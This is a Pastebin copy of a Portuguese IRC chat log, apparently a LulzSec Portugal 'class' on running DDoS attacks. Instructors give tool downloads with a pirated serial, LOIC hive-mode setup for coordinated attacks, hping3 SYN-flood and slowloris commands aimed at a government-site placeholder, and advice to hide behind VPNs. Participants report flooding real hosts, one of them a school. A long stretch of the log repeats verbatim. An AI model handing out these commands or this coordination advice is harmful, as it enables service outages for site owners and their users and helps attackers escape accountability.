Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- aula/discussão ATAQUE DDOS (1ª parte) por c0ldc0d3r -
- ------------------------------------------------------------------------------------------------------------
- Aula Resumida:
- ----
- Windows
- DoSHTTP 2.5.1
- DOWNLOAD URL: http://www.socketsoft.net/download/doshttp_setup.exe
- SERIAL: dh10a-0064-5612-1234-37b5-9701
- LOIC (é só correr):
- DOWNLOAD URL: http://sourceforge.net/projects/hivemindloic/files/latest/download
- Server: irc.freshirc.com
- Canal: #lulzsecportugal
- Mudar para: FUCKING IRC HIVE MODE
- ----//-------------//------------
- Linux:
- Install: sudo apt-get install hping3
- Flood Command: hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
- Case of lag: --flood para -i u100
- ----//------------//-------------
- Verificar portas: ping.eu/port-chk/
- ------------------------------------------------------------------------------------------------------------
- Aula Resumida:
- ------------------------------------------------------------------------------------------------------------
- * w4r10ck (webchat@AN-ivc.474.m6tpja.IP) entrou em #aula
- * Marmelo (marmelo@lulzsecportugal.com) entrou em #aula
- <Marmelo> boas
- <c0ldc0d3r> boas
- <AntiSecPT278> broas
- <AntiSecPT278> xD
- <Marmelo> c0ld voz me plss?
- <Marmelo> olha que sacrificio
- <Marmelo> estava eu a jogar
- * c0ldc0d3r oferece voz a Marmelo
- <Marmelo> e sai do windows so para vir para aqui
- <Marmelo> tas a ver lol
- * VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
- * w4r10ck saiu (Ping timeout: 121 seconds)
- * Dagun (webchat@AN-mif.uvq.rloiam.IP) entrou em #aula
- * inetking (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
- <Dagun> boas
- * mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
- * MikeZ (webchat@AN-fs7.uas.g29tu8.IP) entrou em #aula
- * l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
- * bl4ck (webchat@AN-f49.isc.j12pk9.IP) entrou em #aula
- * w4r10ck (webchat@AN-vv8.k64.45hl4i.IP) entrou em #aula
- * sc0rp (sc0rp@127.0.0.1) entrou em #aula
- * joao_ (joao@AN-j69.rhd.6cqjs0.IP) entrou em #aula
- * AntiSecPT594 (webchat@AN-3rl.a7v.g29tu8.IP) entrou em #aula
- * Made (webchat@AN-q7o.pmt.arjsab.IP) entrou em #aula
- * trolololguy_ (trolololguy__@AN-ter.ilk.h3nreq.IP) entrou em #aula
- * JojO1z (webchat@AN-gc1.4mh.hqmp6l.IP) entrou em #aula
- <c0ldc0d3r> Então pessoal, tudo bem com vocês?
- <Marmelo> c0ld é melhor fazeres +m acho que é isso
- <c0ldc0d3r> hum?
- <Marmelo> eu estou +/-
- <c0ldc0d3r> podes ir jogar lol
- <wokmaster> could be better
- <wokmaster> :)
- <Marmelo> tipo estou a dizer para bloquares o chat daqui a um bocado
- * krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
- <c0ldc0d3r> népia
- * emptydev (a@emptydev.google.suck.it) entrou em #aula
- <c0ldc0d3r> senão como vão tirar dúvidas?
- <emptydev> Que cena :o
- <Marmelo> a sim por pvt pah
- <Marmelo> como ontem
- <Marmelo> senao é uma confusao ...
- <c0ldc0d3r> pvt o cr** que não vou estar a responder um a um.
- <Made> o prof tá atrasado 7 min bora bazar xD
- * Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
- <Marmelo> lol Made
- <c0ldc0d3r> Made, hahah
- <Made> :D
- <mitsai> é aqui
- <mitsai> +v
- <mitsai> pl
- <c0ldc0d3r> Mais uns 2 minutos e começamos.
- <Marmelo> mas olha tamos tipo a explicar
- <Marmelo> e vai vir um otario a fazer spam
- <c0ldc0d3r> leva ban.
- <Marmelo> se for como ontem 100+ pessoas
- <Marmelo> imagina
- <c0ldc0d3r> não vai ser lol
- <c0ldc0d3r> irc está tudo mamado
- <Marmelo> lol
- <Marmelo> isso é bom entao lol
- <AntiSecPT278> é neste ou no anonnet.org?
- <c0ldc0d3r> é aqui a aula.
- <AntiSecPT278> felizmente
- <AntiSecPT278> o outro está péssimo
- <c0ldc0d3r> ok, vamos dar início.
- <w4r10ck> c0ld é que ta bue pessoal no anonnet
- <AntiSecPT278> deviam actualizar o twitter com o correcto
- <c0ldc0d3r> w4r10ck, tem que ser neste...
- <w4r10ck> yah yah tb acho melhor o outro server ta uma lastima
- * krak-chevaliers saiu (Ping timeout: 121 seconds)
- * tuga (webchat@AN-iuq.ep7.6cqjs0.IP) entrou em #aula
- <c0ldc0d3r> vão ser necessárias 2 ferramentas para os ataques DDoS
- <c0ldc0d3r> para quem usa window$ claro.
- <tuga> a aula já começou á muito? :/
- <c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
- <c0ldc0d3r> tuga, acabou de começar.
- <Marmelo> lol ainda nao começou praticamente
- <Marmelo> vamos la
- <Marmelo> Apartir de agora so podem mandar uma mensagem de cada vez e tem que ser uma questao ou algo importante
- <c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
- <Marmelo> Pergunta : E o GoodBye?
- <c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
- <joao_> e quem tem linux ?
- <c0ldc0d3r> Marmelo, goodbye não é muito seguro.. ele crasha a meio do ataque.
- <c0ldc0d3r> joao_, já digo para quem tem linux.
- * Gunp0wd3rPl0t saiu (Ping timeout: 121 seconds)
- <c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
- * l4m8d4 saiu (*.net *.split)
- * wokmaster saiu (*.net *.split)
- <c0ldc0d3r> poderão*
- <c0ldc0d3r> Agora, para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
- * l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
- <tuga> pergunta: qual é o site que está a ser vitima entao?
- <c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
- <AntiSecPT278> -.-
- <c0ldc0d3r> Caso a rede vá abaixo, mudem de --flood para -i u100
- <c0ldc0d3r> Dúvidas?
- <Marmelo> Sim
- <Marmelo> o que queres dizer com rede ?
- <c0ldc0d3r> a vossa própria "internet"
- <c0ldc0d3r> ou seja, se não conseguirem acessar o google por exemplo, devido ao ataque.
- <Marmelo> ok
- <c0ldc0d3r> para não estar a sob-carregar a rede, mudam de --flood para -i u100
- <c0ldc0d3r> olha depois mete isto tudo no pastebin e dá ao caravela..
- <mitsai> --- www.xxxxxxxxx.rcts.pt hping statistic ---
- <mitsai> 351986 packets transmitted, 0 packets received, 100% packet loss // Este site nao responde aos pedidos de ping.
- <Marmelo> ok ve se me lembras
- <Made> Pergunta: Servidores que usam CloudLinux, e a firewall não deixa fazer mais do que 3 requests por segundo essas ferramentas dão?
- <sc0rp> o loic sim da
- <c0ldc0d3r> Made, humm..
- <sc0rp> pois envia a informaçao dentro de uma unica coneção ao envez de criar multiplas ligaçoes
- <c0ldc0d3r> isso não serve de muito
- * Tsunamy_ (webchat@AN-1ob.9be.j12pk9.IP) entrou em #aula
- <c0ldc0d3r> mandar 3 requests por segundo..
- <c0ldc0d3r> nem faz muito sentido..
- <c0ldc0d3r> porém, poderás usar o slowloris
- * wokmaster (rooting@AN-pqc.tda.sh4ali.IP) entrou em #aula
- <c0ldc0d3r> http://ha.ckers.org/slowloris/slowloris.pl
- <sc0rp> bem era esse que me estava a referir
- <emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
- <Made> não é mandar, a firewall é que não deixa fazer c0ldc0der
- <sc0rp> e nao o loic
- <c0ldc0d3r> depois é só fazer perl slowloris.pl -dns www.vitima.com -timeout 5
- <tuga> <~c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt |||| nao percebi esta parte :S
- <sc0rp> peço desculpa
- <c0ldc0d3r> tuga, essa parte é só para quem usar linux
- <c0ldc0d3r> usas linux?
- <tuga> ah ok
- <tuga> w vista
- <c0ldc0d3r> emt
- <tuga> nop
- <c0ldc0d3r> então fica-te pelo loic & DoSHTTP 2.5.1
- <emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
- <tuga> sim, o loic ja fiz a cena de conectar, deu-me um IP, o dosHTTP também já registei o serial, mas agora o que faço?
- <c0ldc0d3r> emptydev, servidores disponíveis como assim? os da vítima?
- <emptydev> Yup.. DNS's...
- <Marmelo> Pergunta MUITO importante : Portanto para não saberem o nosso IP verdadeiro , ao usar algum desses programas teremos que usar um vpn ?
- * sh4d0wf40 (other@AN-uui.9t0.s1ct8s.IP) entrou em #aula
- <c0ldc0d3r> para verificar se o ataque está a causar impacto, é ir ao ping.eu/port-chk/ e colocar o site e a porta 80
- * krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
- <c0ldc0d3r> Marmelo, sim, sempre ajuda mais usar vpn
- * Grep (Grep@AN-t3n.nat.sh4ali.IP) entrou em #aula
- <sc0rp> bem
- <emptydev> c0ldc0d3r, esse site não verifica só se a porta 80 está aberta?
- <c0ldc0d3r> sim, que é a porta do site.
- <tuga> dúvida: nós é que escolhemos um site qualquer para fazer o que estámos a fazer agora?
- <Marmelo> Pergunta : No loic existe algumas opçoes de ataque , que nao me lembro , penso que era HTTP , ...
- <c0ldc0d3r> o resto pouco interessa.
- <Marmelo> qual a melhor dessas
- <sc0rp> fiz um pequeno video de uma ferramenta de synflood, contudo nao derrubei nenhum site de proposito
- <c0ldc0d3r> tuga, sim.
- * neopunk (neopunk@AN-edd.acp.kbtmgr.IP) entrou em #aula
- <c0ldc0d3r> Marmelo, sim, há o http, tcp e o udp
- <sc0rp> penso que nao faz mal nenhum verem como se procede um attack
- <sc0rp> http://videobam.com/nDOqA
- <Marmelo> qual deles sera o melhor?
- <c0ldc0d3r> o tcp e o http..
- <c0ldc0d3r> porém, se for muita gente, o udp é muito bom.. pois causa impacto na rede toda..
- * Desligou (Ligação terminada no destino).
- FiSH: Chat in #aula will NOT be encrypted (no key found)
- * A conversar em #aula
- * ChanServ coloca o modo +q #aula c0ldc0d3r
- * ChanServ coloca o modo de operador a c0ldc0d3r
- <c0ldc0d3r> peço desculpa
- <c0ldc0d3r> tive um problema na rede
- <tuga> nao tou a perceber nada disto lol xD
- <Marmelo> np
- <sc0rp> é um pouco mais simplificado mas nao tem tantas opções
- <tuga> na boa
- * poptrolha (webchat@AN-j3o.6q6.l7icd1.IP) entrou em #aula
- <c0ldc0d3r> tuga, fizeste download das ferramentas?
- <sc0rp> wireshark
- <sc0rp> *
- * Caravela|Lulz (boh@caravela.lulz.pt) entrou em #aula
- * ChanServ coloca o modo +q #aula Caravela|Lulz
- * ChanServ coloca o modo de operador a Caravela|Lulz
- <Marmelo> ah ok entao o wireshark fica mais simples ne?
- <tuga> sim
- <sc0rp> estava a mudar o portatil de sitio
- <Made> DDos? :D
- <sc0rp> no
- <Marmelo> ok entao
- <AntiSecPT278> no wireshark tens filtros
- * PATRAOjhN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
- <sc0rp> é mais simples para quem entende o trafico e muito melhor para iniciantes, mas o etherape e muito mai facil de usar contudo a informação recebida do servidor nao e a mais detalhada
- <sh4d0wf40> pessoal peço desculpa incomudar..mas na outra sala está lá pessoal que queria assistir as aulas mas não dá para falar e avisar o pessoal..só o caravela é que é op
- * Caravela|Lulz coloca o modo +m #aula
- * ruicruz (ruicruz@AN-tic.j0n.g9g7iv.IP) entrou em #aula
- <c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
- <c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
- <c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
- * AntiSecPT407 (webchat@AN-2ha.off.6qn8qq.IP) entrou em #aula
- <c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
- * aula754 (558a3c21@AN-trk.ahu.7j6nol.IP) entrou em #aula
- * unkn0wn (unkn0wn@AN-g1c.sni.4imr8a.IP) entrou em #aula
- <c0ldc0d3r> para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
- <c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
- <Marmelo> Relembro que usem vpn enquanto fazem isto!
- <c0ldc0d3r> Caravela|Lulz, vai colocando isso no pastebin que não estou para repetir mais vezes
- <c0ldc0d3r> Caravela|Lulz, colocas-te +m e agora as dúvidas lol?
- <Caravela|Lulz> duvidas façam em pvt
- <Caravela|Lulz> depois fazes copy paste aqui e respondes
- <Caravela|Lulz> para nao haver spam
- * kaos (webchat@AN-c5d.qud.arjsab.IP) entrou em #aula
- <c0ldc0d3r> pois, mas eu tenho o xchat cheio de redes e não dá-me jeito nenhum
- <Marmelo> caravela estava a ir bem
- <Caravela|Lulz> ok
- * Caravela|Lulz coloca o modo -m #aula
- <Marmelo> ok alguma pergunta?
- * c0ldc0d3r coloca o modo de operador a mitsai
- * c0ldc0d3r oferece voz a mitsai
- <Marmelo> Relembro que quem fizer spam leva ban imediato
- * jgut (529ab6c4@AN-trk.ahu.7j6nol.IP) entrou em #aula
- <tuga> sim
- <Caravela|Lulz> faz me um copy paste do log até agora para eu depois guardar em pastebin
- <c0ldc0d3r> paste onde?
- <tuga> coldcoder, já diz tudo até tu onde disses-te, e agora?
- <c0ldc0d3r> piratepad?
- <jgut> nights a tds
- <c0ldc0d3r> tuga, agora é guardar tudo e amanhã colocarás em ação.
- * PATRAOjhN agora chama-se afk_johnnyPATRAODANET
- <Marmelo> lol ja acabou a aula?
- <sc0rp> lol
- * Hikas (5998a3a5@AN-k5k.v7s.hin4td.IP) entrou em #aula
- * jpir (webchat@AN-he6.c2p.6om10t.IP) entrou em #aula
- <c0ldc0d3r> Marmelo, não há muito à dizer..
- <Marmelo> pois nao lol
- * jgut saiu (Quit: http://www.mibbit.com ajax IRC Client)
- <tuga> amanha? mas escolho um site que eu quiser? tenho de começar a fazer o ataque hoje e deixar a noite toda o pc ligado?
- * Kondoriano (marco@AN-6rp.b7j.od2i7s.IP) entrou em #aula
- <c0ldc0d3r> agora é saber se o pessoal entendou..
- * MaP05 (MaP05@AN-qbn.nlh.vg3fe8.IP) entrou em #aula
- <c0ldc0d3r> já vi que alguém conectou o loic ao hive..
- <c0ldc0d3r> 2 pessoas
- <trolololguy_> uma pergunta
- <Made> c0ldc0der tens é de fazer ai uma auma de sqli
- <AntiSecPT278> O tuga está com fé de ir dentro
- * anarchy (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
- <Made> *uma
- <Grep> c0ldc0d3r, para linux o LOIC é igual?
- <trolololguy_> disseste anteriormente q udp era mais eficaz
- <trolololguy_> podes dizer pq?
- <Marmelo> LOIC nao da no linux
- <trolololguy_> sr professor?
- <c0ldc0d3r> Grep, sim
- <c0ldc0d3r> é mais complicado
- <c0ldc0d3r> mas não recomendo loic para linux..
- <c0ldc0d3r> hping3 é mil vezes melhor
- <Kondoriano> já começou?
- <Marmelo> ah my bad pensava que o loic nao dava para o linux
- <mitsai> sim mt melhor
- <Grep> ok isso já tenho ;) como vi a falar de ligar a um irc...
- <Grep> Marmelo, dar dá... com wine :P
- <Marmelo> <trolololguy_> disseste anteriormente q udp era mais eficaz
- * Cereal_Killer (webchat@AN-opo.t9n.1tveis.IP) entrou em #aula
- <c0ldc0d3r> Caravela|Lulz, onde queres que faça paste do log?
- * emptydev- (a@AN-928.r71.7am7ru.IP) entrou em #aula
- <emptydev-> Caravela|Lulz
- <emptydev-> PVT
- * dgrdfg (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
- <emptydev-> http://pastebin.com/TfnBWewg
- <emptydev-> Vejam
- * fx (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
- <c0ldc0d3r> emptydev, boa.
- * beh (boh@AN-us8.nsn.ovi93d.IP) entrou em #aula
- * c0ldc0d3r mudou o tópico para: Aula de hoje resumida: http://pastebin.com/TfnBWewg
- <dgrdfg> estava eu dizendo que deveria haver um sitio pra podermos colocar duvidas e que deviamos elaborar uma faq
- <dgrdfg> visto que as duvidas são mais que muitas
- <c0ldc0d3r> dgrdfg, poderás colocar aqui
- <dgrdfg> e muitas questões são constantemente respondidas
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
- <dgrdfg> tipo sempre o msm
- * An0nf40 (other@AN-i37.9oq.2s61dc.IP) entrou em #aula
- <beh> bem pensado
- * inetking saiu (Ping timeout: 121 seconds)
- * fx agora chama-se inetking
- <c0ldc0d3r> podem usar este canal para ajuda..
- <c0ldc0d3r> é na boa..
- <dgrdfg> c0m0 3h k x3 h@k@ u Fb| ?
- * jhNNN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
- <dgrdfg> por exemplo
- <dgrdfg> tenho uma duvida
- * emptydev saiu (Ping timeout: 121 seconds)
- * MaP05 saiu (Ping timeout: 122 seconds)
- * l4m8d4_ (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
- <dgrdfg> porque é que com algumas VPN's n consigo aceder a determinados sites
- * Funho saiu (Ping timeout: 121 seconds)
- <dgrdfg> ou servers
- <dgrdfg> e como evitar que isso aconteça
- * anarchy saiu (Ping timeout: 121 seconds)
- <Grep> c0ldc0d3r, aquele site ping.eu n é melhor o nmap ?
- * dgrdfg agora chama-se anarchy
- <c0ldc0d3r> isso tem haver com o policy que eles têm contra abusos do serviço..
- * AntiSecPT570 (webchat@AN-t76.bhi.3kcki8.IP) entrou em #aula
- <tuga> coldcoder, quanto tiveres tempo, se tiveres tempo e se fizeres o favor de me contactar, por favor contacta-me em pvt, obrigado
- <c0ldc0d3r> tens que usar outra vpn e de preferência fora da europa.
- <Made> amanha há aula?
- <anarchy> pois foi o que eu pensei
- <anarchy> há que pagar :F
- <c0ldc0d3r> Grep, o nmap verifica com o teu ip
- * VenusProject saiu (Ping timeout: 121 seconds)
- <c0ldc0d3r> o ping.eu não.
- <anarchy> mas há vpn's que têm ports fechadas?
- <c0ldc0d3r> tuga, ok
- * ruicruz saiu (Ping timeout: 127 seconds)
- * afk_johnnyPATRAODANET saiu (Ping timeout: 127 seconds)
- * kaos saiu (Quit: Page closed)
- <Grep> Grep, com o proxychains não, pois não? pelo menos pelo que li :S
- * Kondoriano saiu (Ping timeout: 129 seconds)
- * aula754 saiu (Ping timeout: 128 seconds)
- * sc0rp saiu (Ping timeout: 129 seconds)
- <c0ldc0d3r> proxychains poderá resultar...
- <c0ldc0d3r> é uma questão de verificar
- * w4r10ck saiu (Quit: )
- * Hikas saiu (Ping timeout: 132 seconds)
- * Caravela|Lulz saiu (Ping timeout: 125 seconds)
- * l4m8d4 saiu (Ping timeout: 131 seconds)
- * joao_ saiu (Ping timeout: 125 seconds)
- * Marmelo saiu (Ping timeout: 122 seconds)
- * trolololguy_ saiu (Ping timeout: 129 seconds)
- * mitsai saiu (Ping timeout: 125 seconds)
- * sh4d0wf40 saiu (Ping timeout: 157 seconds)
- * l4m8d4_ agora chama-se l4m8d4
- <Grep> tenho feito uns testes, obvio que é mais lento mas tem funcionado... mas é sempre bom haver outras soluções ;) já aprendi kk koisa
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
- <emptydev-> Tinhamos ido para a quakenet, tinhamos + gente, e ninguem caia.
- <c0ldc0d3r> emptydev-, link.
- <c0ldc0d3r> que eu dou ao caravela
- <c0ldc0d3r> para por no twitter
- <Grep> só uma questão que eu cheguei a meio da aula...
- <tuga> c0ldc0d3r, é suposto no LOIC, em baixo em attack status aparecer muitas vezes a dizer failed? pq tenho uns 32.000
- <Grep> o hping3 substitui o DoSHTTP e o Loic certo?
- <c0ldc0d3r> é, isso significa que o servidor está deixando de responder.
- <c0ldc0d3r> Grep, sim.
- <An0nf40> tuga tu estás a fazer isso com uma vpn certo?
- <tuga> nao lool
- <An0nf40> ou estás simplesmente a testar sem nada lol
- <c0ldc0d3r> vpn é necessário, visto que somos poucos..
- <tuga> mas tipo
- <c0ldc0d3r> se fosse tipo 2 mil e tal pessoas a colaborar.. era cagativo usar vpn no meio de tantos ips..
- <tuga> eu ponho em perigo outras pessoas?
- <c0ldc0d3r> mas como são poucos :\
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
- <aaaamitsai> +v +o
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
- * Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
- <tuga> mas eu nao testei num site do governo
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
- * mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
- * VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
- <An0nf40> não precisa ser do governo lol
- <mitsai> +v +o pl
- * emptydev- saiu (Ping timeout: 121 seconds)
- <An0nf40> eles dão mais importancia a esses...
- <tuga> sim, mas acho que uma escola eles nao dao importancia o.O xD
- <Grep> lol omg
- * DaGun (webchat@AN-a0h.8na.8e30u1.IP) entrou em #aula
- * An0nf40 agora chama-se sh4d0wf40
- <DaGun> boas, vao por a aula de hoje no pastebin?
- <tuga> ao desligar o ataque no LOIC o site volta imediatamente online certo?
- <DaGun> e que tava com problemas na net e perdi uma parte
- <DaGun> :S
- <sh4d0wf40> lolol
- <DaGun> xD
- <tuga> dagun, ja puseram penso eu
- <Made> DaGun http://pastebin.com/TfnBWewg]
- <DaGun> só?
- <c0ldc0d3r> tuga, sim e não.
- * LzKotha (webchat@AN-dft.gs0.hkmcdf.IP) entrou em #aula
- <c0ldc0d3r> se o impacto for muito grande.. o site poderá ficar off até haver assistência física.
- <DaGun> é que eu isso apanhei xD
- * MovingForward (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
- <tuga> ah ok
- <mitsai> +v +o pls
- <Made> Ao usar uma vpn, a vnp não fica com os meus dados no log?
- * w4r10ck (webchat@AN-ivc.474.m6tpja.IP) entrou em #aula
- * Marmelo (marmelo@lulzsecportugal.com) entrou em #aula
- <Marmelo> boas
- <c0ldc0d3r> boas
- <AntiSecPT278> broas
- <AntiSecPT278> xD
- <Marmelo> c0ld voz me plss?
- <Marmelo> olha que sacrificio
- <Marmelo> estava eu a jogar
- * c0ldc0d3r oferece voz a Marmelo
- <Marmelo> e sai do windows so para vir para aqui
- <Marmelo> tas a ver lol
- * VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
- * w4r10ck saiu (Ping timeout: 121 seconds)
- * Dagun (webchat@AN-mif.uvq.rloiam.IP) entrou em #aula
- * inetking (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
- <Dagun> boas
- * mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
- * MikeZ (webchat@AN-fs7.uas.g29tu8.IP) entrou em #aula
- * l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
- * bl4ck (webchat@AN-f49.isc.j12pk9.IP) entrou em #aula
- * w4r10ck (webchat@AN-vv8.k64.45hl4i.IP) entrou em #aula
- * sc0rp (sc0rp@127.0.0.1) entrou em #aula
- * joao_ (joao@AN-j69.rhd.6cqjs0.IP) entrou em #aula
- * AntiSecPT594 (webchat@AN-3rl.a7v.g29tu8.IP) entrou em #aula
- * Made (webchat@AN-q7o.pmt.arjsab.IP) entrou em #aula
- * trolololguy_ (trolololguy__@AN-ter.ilk.h3nreq.IP) entrou em #aula
- * JojO1z (webchat@AN-gc1.4mh.hqmp6l.IP) entrou em #aula
- <c0ldc0d3r> Então pessoal, tudo bem com vocês?
- <Marmelo> c0ld é melhor fazeres +m acho que é isso
- <c0ldc0d3r> hum?
- <Marmelo> eu estou +/-
- <c0ldc0d3r> podes ir jogar lol
- <wokmaster> could be better
- <wokmaster> :)
- <Marmelo> tipo estou a dizer para bloquares o chat daqui a um bocado
- * krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
- <c0ldc0d3r> népia
- * emptydev (a@emptydev.google.suck.it) entrou em #aula
- <c0ldc0d3r> senão como vão tirar dúvidas?
- <emptydev> Que cena :o
- <Marmelo> a sim por pvt pah
- <Marmelo> como ontem
- <Marmelo> senao é uma confusao ...
- <c0ldc0d3r> pvt o cr** que não vou estar a responder um a um.
- <Made> o prof tá atrasado 7 min bora bazar xD
- * Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
- <Marmelo> lol Made
- <c0ldc0d3r> Made, hahah
- <Made> :D
- <mitsai> é aqui
- <mitsai> +v
- <mitsai> pl
- <c0ldc0d3r> Mais uns 2 minutos e começamos.
- <Marmelo> mas olha tamos tipo a explicar
- <Marmelo> e vai vir um otario a fazer spam
- <c0ldc0d3r> leva ban.
- <Marmelo> se for como ontem 100+ pessoas
- <Marmelo> imagina
- <c0ldc0d3r> não vai ser lol
- <c0ldc0d3r> irc está tudo mamado
- <Marmelo> lol
- <Marmelo> isso é bom entao lol
- <AntiSecPT278> é neste ou no anonnet.org?
- <c0ldc0d3r> é aqui a aula.
- <AntiSecPT278> felizmente
- <AntiSecPT278> o outro está péssimo
- <c0ldc0d3r> ok, vamos dar início.
- <w4r10ck> c0ld é que ta bue pessoal no anonnet
- <AntiSecPT278> deviam actualizar o twitter com o correcto
- <c0ldc0d3r> w4r10ck, tem que ser neste...
- <w4r10ck> yah yah tb acho melhor o outro server ta uma lastima
- * krak-chevaliers saiu (Ping timeout: 121 seconds)
- * tuga (webchat@AN-iuq.ep7.6cqjs0.IP) entrou em #aula
- <c0ldc0d3r> vão ser necessárias 2 ferramentas para os ataques DDoS
- <c0ldc0d3r> para quem usa window$ claro.
- <tuga> a aula já começou á muito? :/
- <c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
- <c0ldc0d3r> tuga, acabou de começar.
- <Marmelo> lol ainda nao começou praticamente
- <Marmelo> vamos la
- <Marmelo> Apartir de agora so podem mandar uma mensagem de cada vez e tem que ser uma questao ou algo importante
- <c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
- <Marmelo> Pergunta : E o GoodBye?
- <c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
- <joao_> e quem tem linux ?
- <c0ldc0d3r> Marmelo, goodbye não é muito seguro.. ele crasha a meio do ataque.
- <c0ldc0d3r> joao_, já digo para quem tem linux.
- * Gunp0wd3rPl0t saiu (Ping timeout: 121 seconds)
- <c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
- * l4m8d4 saiu (*.net *.split)
- * wokmaster saiu (*.net *.split)
- <c0ldc0d3r> poderão*
- <c0ldc0d3r> Agora, para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
- * l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
- <tuga> pergunta: qual é o site que está a ser vitima entao?
- <c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
- <AntiSecPT278> -.-
- <c0ldc0d3r> Caso a rede vá abaixo, mudem de --flood para -i u100
- <c0ldc0d3r> Dúvidas?
- <Marmelo> Sim
- <Marmelo> o que queres dizer com rede ?
- <c0ldc0d3r> a vossa própria "internet"
- <c0ldc0d3r> ou seja, se não conseguirem acessar o google por exemplo, devido ao ataque.
- <Marmelo> ok
- <c0ldc0d3r> para não estar a sob-carregar a rede, mudam de --flood para -i u100
- <c0ldc0d3r> olha depois mete isto tudo no pastebin e dá ao caravela..
- <mitsai> --- www.xxxxxxxxx.rcts.pt hping statistic ---
- <mitsai> 351986 packets transmitted, 0 packets received, 100% packet loss // Este site nao responde aos pedidos de ping.
- <Marmelo> ok ve se me lembras
- <Made> Pergunta: Servidores que usam CloudLinux, e a firewall não deixa fazer mais do que 3 requests por segundo essas ferramentas dão?
- <sc0rp> o loic sim da
- <c0ldc0d3r> Made, humm..
- <sc0rp> pois envia a informaçao dentro de uma unica coneção ao envez de criar multiplas ligaçoes
- <c0ldc0d3r> isso não serve de muito
- * Tsunamy_ (webchat@AN-1ob.9be.j12pk9.IP) entrou em #aula
- <c0ldc0d3r> mandar 3 requests por segundo..
- <c0ldc0d3r> nem faz muito sentido..
- <c0ldc0d3r> porém, poderás usar o slowloris
- * wokmaster (rooting@AN-pqc.tda.sh4ali.IP) entrou em #aula
